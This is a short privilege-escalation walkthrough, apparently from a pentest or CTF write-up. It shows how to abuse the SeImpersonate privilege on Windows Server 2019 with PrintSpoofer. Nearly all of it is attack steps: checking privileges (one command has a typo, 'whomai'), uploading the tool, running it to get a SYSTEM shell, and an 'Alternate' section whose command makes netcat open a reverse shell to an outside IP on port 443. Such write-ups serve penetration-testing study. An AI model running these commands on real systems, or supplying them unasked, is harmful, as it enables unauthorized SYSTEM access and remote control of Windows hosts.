PrintSpoofer
Rogue-Potato abused SeImpersonate privilege to get execution as SYSTEM for Windows Server 2019. PrintSpoofer can be an alternate to Rogue-Potato. You can exploit SeImpersonate privilege on Windows Server 2019 with PrintSpoofer and it’s so easy.
Exploitation
whomai /priv
Check for systeminfo
The OS is Microsoft Windows server 2019 and x64-bit arch. SeImpersonate privilege is Enabled. With this information it seems that host is likey vulnerable to PrintSpoofer.
Upload the PrintSpoofer to target machine.
Execute the exploit.
.\PrintSpoofer.exe -i -c cmd
We’re SYSTEM now!
Alternate
We can also get a reverse shell if we want. Execute nc binary with PrintSpoofer.
.\PrintSpoofer.exe -c ".\nc.exe 10.11.x.x 443 -e cmd"